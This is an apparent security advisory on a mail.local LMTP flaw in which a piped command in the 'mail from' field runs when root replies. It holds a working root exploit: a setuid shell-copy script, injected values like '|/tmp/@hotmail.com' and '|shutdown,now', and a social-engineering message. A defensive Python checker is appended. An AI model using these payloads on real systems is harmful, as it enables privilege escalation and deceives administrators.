[ SOURCE: http://www.secureroot.com/security/advisories/9735785296.html ]

hi,

mail.local is a little setuid root program designed, as its name suggests, for local mail delivery. Used with the -l option, it gives an interactive mode speaking the LMTP protocol (a simplified SMTP for local mail delivery only).

A weakness exists in the 'mail from' field that allows any local user to insert a piped shell command that may be executed by the recipient when he replies with the mail command. A little social engineering skill should help to root the box.

Finally, mail.local shouldn't allow such escape chars even in the mail from field, and the mail command shouldn't allow such a reply through a pipe.

A space char in the command will terminate the string, so either use a single command like '|reboot' or use a comma, which should be converted to a space by mail, e.g. '|shutdown,now'.

Linux 2.4.0 beta Caldera, as freely distributed during Defcon 00, is vulnerable to this problem. That looks like the old sendmail bugs nostalgia.

=======

#cat exploit
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

#id
#id=666(c3rb3r) gid=100(user)
#
#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l
....
mail from:<|/tmp/@hotmail.com>
(u can use many senders to hide the evil string)
rcpt to:
data
Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?
thanx.
c3rb3r
.
quit
.....

(now wait for a reply and then, )

#ls /tmp
@hotmail.com newsh
#/tmp/newsh
#id
#id=0(root) gid=0(root)
#echo 'very nice, thanx a lot' | mail -s 'thanx' root

//

With thanks,

Have a nice day,

Gregory Duchemin
Security consultant
1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8
CANADA
c3rb3r@hotmail.com
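A defender's check for the weakness described above, as an added example that is not part of the original advisory: it parses the 'mail from' lines of an LMTP session transcript and rejects any reverse-path that carries shell metacharacters such as '|' (or the comma trick) before the message is ever queued, which is the kind of filtering the post says mail.local should do. The constructed transcript, the conservative mailbox grammar and the function names are assumptions of this example.

```python
import re

# Characters a shell, or mail(1) building a reply, would interpret.
# '|' is the one this advisory abuses; the others are flagged as well.
SHELL_METACHARS = set("|;&`$<>()\\\"'\n\t")

# Conservative subset of the RFC 5321 dot-atom grammar (assumption: the
# shell-relevant atext characters are deliberately left out).
_ATEXT = r"[A-Za-z0-9!#%*+/=?^_{}~-]+(?:\.[A-Za-z0-9!#%*+/=?^_{}~-]+)*"
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_MAILBOX = re.compile("^" + _ATEXT + "@" + _LABEL + r"(?:\." + _LABEL + ")*$")

def parse_mail_from(line):
    """Return the reverse-path of an LMTP 'MAIL FROM:<...>' line, else None."""
    m = re.match(r"^\s*mail\s+from:\s*<([^>]*)>", line, re.IGNORECASE)
    return None if m is None else m.group(1)

def check_return_path(path):
    """Classify a reverse-path; returns (accepted, reason)."""
    if path == "":
        return True, "null reverse-path (bounce), allowed"
    bad = sorted(c for c in set(path) if c in SHELL_METACHARS)
    if bad:
        return False, "shell metacharacter(s) %s in reverse-path" % bad
    if "," in path:  # mail(1) may turn commas into spaces: '|shutdown,now'
        return False, "comma in reverse-path"
    if not _MAILBOX.match(path):
        return False, "reverse-path is not a plain mailbox@domain"
    return True, "ok"

def audit_session(lines):
    """Run the check over every MAIL FROM line of a session transcript.
    Returns a list of (line_no, reverse_path, reason) for rejected lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        path = parse_mail_from(line)
        if path is None:
            continue
        ok, reason = check_return_path(path)
        if not ok:
            findings.append((n, path, reason))
    return findings

# Constructed sample transcript, modelled on the advisory's session.
SAMPLE_SESSION = [
    "LHLO localhost",
    "mail from:<|/tmp/@hotmail.com>",
    "rcpt to:<root>",
    "mail from:<|shutdown,now>",
    "mail from:<alice@example.com>",
    "mail from:<>",
    "quit",
]

if __name__ == "__main__":
    for n, path, reason in audit_session(SAMPLE_SESSION):
        print("line %d: rejected <%s>: %s" % (n, path, reason))
```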